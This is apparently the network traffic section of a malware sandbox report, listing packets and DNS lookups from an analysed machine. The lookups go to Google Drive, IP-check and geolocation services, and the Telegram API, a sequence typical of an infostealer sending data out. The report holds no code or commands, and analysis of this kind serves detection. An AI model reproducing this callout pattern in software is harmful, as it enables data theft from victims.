                                                                Oct 10, 2024 09:28:23.966475010 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.966573000 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.966578007 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.966681004 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.968308926 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.968405008 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.968419075 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.968461990 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.970098019 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.970146894 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.970232964 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.970335960 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.971811056 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.971863031 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.971890926 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.971935034 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.973573923 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.973674059 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.973680019 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.973738909 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.975431919 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.975544930 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.975557089 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.976941109 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.976944923 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.977027893 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.977031946 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.977097034 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.978909016 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.979007959 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.979013920 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.979127884 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.981303930 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.981395006 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.981404066 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.981575966 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.983520031 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.983629942 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.983634949 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.983697891 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.984133959 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.984193087 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.984292030 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.984376907 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.985765934 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.985820055 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.985841990 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.985954046 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.987284899 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.987401009 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.987413883 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.987467051 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.988656044 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.988758087 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.988763094 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.988832951 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.990035057 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.990717888 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.990727901 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.990811110 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.991625071 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.991801977 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.991827011 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.991832972 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.991883039 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.991883039 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.993009090 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.993079901 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.993109941 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.993212938 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.994504929 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.994626045 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.994631052 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.994823933 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.996175051 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.996742964 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.996750116 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.996824026 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.997165918 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.997230053 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.997232914 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.997322083 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.998703957 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.998827934 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:23.998832941 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:23.998970985 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:24.000859022 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:24.001025915 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:24.001030922 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:24.001173019 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:24.003093958 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:24.003204107 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:24.003215075 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:24.003215075 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:24.003223896 CEST44349974142.250.185.161192.168.2.7
                                                                Oct 10, 2024 09:28:24.003282070 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:24.003379107 CEST49974443192.168.2.7142.250.185.161
                                                                Oct 10, 2024 09:28:24.247759104 CEST4997580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:24.252629042 CEST8049975132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:24.252701044 CEST4997580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:24.252916098 CEST4997580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:24.257652998 CEST8049975132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:25.157804012 CEST8049975132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:25.198924065 CEST4997580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:25.226861954 CEST4997580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:25.231816053 CEST8049975132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:25.505796909 CEST8049975132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:25.558303118 CEST4997580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:26.103313923 CEST49978443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:26.103348970 CEST44349978188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:26.103414059 CEST49978443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:26.106642962 CEST49978443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:26.106658936 CEST44349978188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:26.566230059 CEST44349978188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:26.566307068 CEST49978443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:26.569375038 CEST49978443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:26.569387913 CEST44349978188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:26.569667101 CEST44349978188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:26.573256969 CEST49978443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:26.615412951 CEST44349978188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:27.083687067 CEST44349978188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:27.083816051 CEST44349978188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:27.083873987 CEST49978443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:27.114495993 CEST49978443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:27.122829914 CEST4997580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:27.127700090 CEST8049975132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:27.726967096 CEST8049975132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:27.727226019 CEST8049975132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:27.727334976 CEST4997580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:27.733283997 CEST49980443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:27.733310938 CEST44349980188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:27.733370066 CEST49980443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:27.733752966 CEST49980443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:27.733763933 CEST44349980188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:28.207395077 CEST44349980188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:28.213684082 CEST49980443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:28.213711023 CEST44349980188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:28.330063105 CEST44349980188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:28.330168009 CEST44349980188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:28.330480099 CEST49980443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:28.330954075 CEST49980443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:28.334577084 CEST4997580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:28.335566044 CEST4998180192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:28.339660883 CEST8049975132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:28.339718103 CEST4997580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:28.340385914 CEST8049981132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:28.340461969 CEST4998180192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:28.340564966 CEST4998180192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:28.345386028 CEST8049981132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:29.279695988 CEST8049981132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:29.288145065 CEST49982443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:29.288193941 CEST44349982188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:29.288279057 CEST49982443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:29.288471937 CEST49982443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:29.288487911 CEST44349982188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:29.323950052 CEST4998180192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:30.596669912 CEST44349982188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:30.603634119 CEST49982443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:30.603655100 CEST44349982188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:30.919028044 CEST44349982188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:30.919125080 CEST44349982188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:30.919198036 CEST49982443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:30.919677019 CEST49982443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:30.942755938 CEST4998380192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:30.947634935 CEST8049983132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:30.950897932 CEST4998380192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:30.950964928 CEST4998380192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:30.955979109 CEST8049983132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:32.038604021 CEST8049983132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:32.040635109 CEST49984443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:32.040687084 CEST44349984188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:32.040796995 CEST49984443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:32.041100979 CEST49984443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:32.041114092 CEST44349984188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:32.252027035 CEST8049983132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:32.252161980 CEST4998380192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:32.501034021 CEST44349984188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:32.502696037 CEST49984443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:32.502775908 CEST44349984188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:32.645086050 CEST44349984188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:32.645206928 CEST44349984188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:32.645328999 CEST49984443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:32.645761967 CEST49984443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:32.648583889 CEST4998380192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:32.649583101 CEST4998580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:32.653722048 CEST8049983132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:32.653794050 CEST4998380192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:32.654438972 CEST8049985132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:32.654505968 CEST4998580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:32.654583931 CEST4998580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:32.659406900 CEST8049985132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:34.426436901 CEST8049985132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:34.427721977 CEST49986443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:34.427778959 CEST44349986188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:34.427864075 CEST49986443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:34.428077936 CEST49986443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:34.428093910 CEST44349986188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:34.573998928 CEST4998580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:34.894160032 CEST44349986188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:34.896394014 CEST49986443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:34.896419048 CEST44349986188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:35.044910908 CEST44349986188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:35.045022964 CEST44349986188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:35.045176983 CEST49986443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:35.045697927 CEST49986443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:35.048868895 CEST4998580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:35.050483942 CEST4998780192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:35.054028034 CEST8049985132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:35.054122925 CEST4998580192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:35.055257082 CEST8049987132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:35.055413961 CEST4998780192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:35.056756973 CEST4998780192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:35.061559916 CEST8049987132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:36.165354967 CEST8049987132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:36.166723967 CEST49988443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:36.166768074 CEST44349988188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:36.166852951 CEST49988443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:36.167144060 CEST49988443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:36.167162895 CEST44349988188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:36.215018034 CEST4998780192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:36.695538044 CEST44349988188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:36.697191000 CEST49988443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:36.697226048 CEST44349988188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:36.834400892 CEST44349988188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:36.834502935 CEST44349988188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:36.834584951 CEST49988443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:36.835093021 CEST49988443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:36.839406967 CEST4998780192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:36.840105057 CEST4998980192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:36.844599962 CEST8049987132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:36.844717979 CEST4998780192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:36.845097065 CEST8049989132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:36.845180035 CEST4998980192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:36.845266104 CEST4998980192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:36.850086927 CEST8049989132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:37.648166895 CEST8049989132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:37.659020901 CEST49990443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:37.659066916 CEST44349990188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:37.659132957 CEST49990443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:37.663316965 CEST49990443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:37.663331985 CEST44349990188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:37.698982954 CEST4998980192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:38.128340006 CEST44349990188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:38.137573957 CEST49990443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:38.137607098 CEST44349990188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:38.272044897 CEST44349990188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:38.272150040 CEST44349990188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:38.272221088 CEST49990443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:38.273005962 CEST49990443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:38.278867006 CEST4998980192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:38.279562950 CEST4999180192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:38.284240007 CEST8049989132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:38.284293890 CEST4998980192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:38.284333944 CEST8049991132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:38.284401894 CEST4999180192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:38.284524918 CEST4999180192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:38.289364100 CEST8049991132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:39.127578020 CEST8049991132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:39.129139900 CEST49992443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:39.129182100 CEST44349992188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:39.129260063 CEST49992443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:39.129514933 CEST49992443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:39.129532099 CEST44349992188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:39.167874098 CEST4999180192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:39.583698034 CEST44349992188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:39.585294008 CEST49992443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:39.585360050 CEST44349992188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:39.703784943 CEST44349992188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:39.703896999 CEST44349992188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:39.703977108 CEST49992443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:39.704442978 CEST49992443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:39.707674980 CEST4999180192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:39.708801985 CEST4999380192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:39.712766886 CEST8049991132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:39.712868929 CEST4999180192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:39.713603973 CEST8049993132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:39.713682890 CEST4999380192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:39.713779926 CEST4999380192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:39.718504906 CEST8049993132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:41.414132118 CEST8049993132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:41.415585041 CEST49994443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:41.415621042 CEST44349994188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:41.415688038 CEST49994443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:41.415983915 CEST49994443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:41.415996075 CEST44349994188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:41.464646101 CEST4999380192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:41.894382954 CEST44349994188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:41.896071911 CEST49994443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:41.896112919 CEST44349994188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:42.009365082 CEST44349994188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:42.009464025 CEST44349994188.114.97.3192.168.2.7
                                                                Oct 10, 2024 09:28:42.009521961 CEST49994443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:42.009931087 CEST49994443192.168.2.7188.114.97.3
                                                                Oct 10, 2024 09:28:42.051964045 CEST4999380192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:42.057708025 CEST8049993132.226.8.169192.168.2.7
                                                                Oct 10, 2024 09:28:42.057811975 CEST4999380192.168.2.7132.226.8.169
                                                                Oct 10, 2024 09:28:42.060480118 CEST49995443192.168.2.7149.154.167.220
                                                                Oct 10, 2024 09:28:42.060527086 CEST44349995149.154.167.220192.168.2.7
                                                                Oct 10, 2024 09:28:42.060597897 CEST49995443192.168.2.7149.154.167.220
                                                                Oct 10, 2024 09:28:42.067621946 CEST49995443192.168.2.7149.154.167.220
                                                                Oct 10, 2024 09:28:42.067642927 CEST44349995149.154.167.220192.168.2.7
                                                                Oct 10, 2024 09:28:42.687685966 CEST44349995149.154.167.220192.168.2.7
                                                                Oct 10, 2024 09:28:42.687853098 CEST49995443192.168.2.7149.154.167.220
                                                                Oct 10, 2024 09:28:42.690706015 CEST49995443192.168.2.7149.154.167.220
                                                                Oct 10, 2024 09:28:42.690730095 CEST44349995149.154.167.220192.168.2.7
                                                                Oct 10, 2024 09:28:42.691040993 CEST44349995149.154.167.220192.168.2.7
                                                                Oct 10, 2024 09:28:42.692354918 CEST49995443192.168.2.7149.154.167.220
                                                                Oct 10, 2024 09:28:42.735416889 CEST44349995149.154.167.220192.168.2.7
                                                                Oct 10, 2024 09:28:42.932898998 CEST44349995149.154.167.220192.168.2.7
                                                                Oct 10, 2024 09:28:42.932976007 CEST44349995149.154.167.220192.168.2.7
                                                                Oct 10, 2024 09:28:42.933135033 CEST49995443192.168.2.7149.154.167.220
                                                                Oct 10, 2024 09:28:42.935611010 CEST49995443192.168.2.7149.154.167.220
                                                                Oct 10, 2024 09:28:48.723139048 CEST4998180192.168.2.7132.226.8.169
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 10, 2024 09:27:40.912571907 CEST5191153192.168.2.71.1.1.1
                                                                Oct 10, 2024 09:27:40.920089006 CEST53519111.1.1.1192.168.2.7
                                                                Oct 10, 2024 09:27:41.969146967 CEST5689953192.168.2.71.1.1.1
                                                                Oct 10, 2024 09:27:41.976136923 CEST53568991.1.1.1192.168.2.7
                                                                Oct 10, 2024 09:28:24.237627983 CEST6134553192.168.2.71.1.1.1
                                                                Oct 10, 2024 09:28:24.244301081 CEST53613451.1.1.1192.168.2.7
                                                                Oct 10, 2024 09:28:26.095164061 CEST5475053192.168.2.71.1.1.1
                                                                Oct 10, 2024 09:28:26.101918936 CEST53547501.1.1.1192.168.2.7
                                                                Oct 10, 2024 09:28:42.052723885 CEST6268153192.168.2.71.1.1.1
                                                                Oct 10, 2024 09:28:42.059847116 CEST53626811.1.1.1192.168.2.7
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 10, 2024 09:27:40.912571907 CEST192.168.2.71.1.1.10x9995Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:27:41.969146967 CEST192.168.2.71.1.1.10x4b6Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:24.237627983 CEST192.168.2.71.1.1.10x8bd8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:26.095164061 CEST192.168.2.71.1.1.10x97deStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                Oct 10, 2024 09:28:42.052723885 CEST192.168.2.71.1.1.10xe8f1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
